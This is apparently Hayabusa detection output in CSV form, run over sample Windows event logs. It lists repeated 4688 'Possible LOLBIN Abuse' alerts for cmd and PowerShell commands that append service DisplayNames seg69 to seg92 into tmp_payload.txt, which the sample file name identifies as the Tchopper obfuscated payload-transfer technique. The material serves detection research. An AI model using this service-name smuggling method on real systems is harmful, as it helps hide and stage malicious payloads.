2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x390 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:10.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:10.036 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:11.507 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:11.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:17.308 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:18.775 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:18.790 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:21.707 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:21.722 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:27.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:27.575 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:31.906 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:31.922 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:37.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:37.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
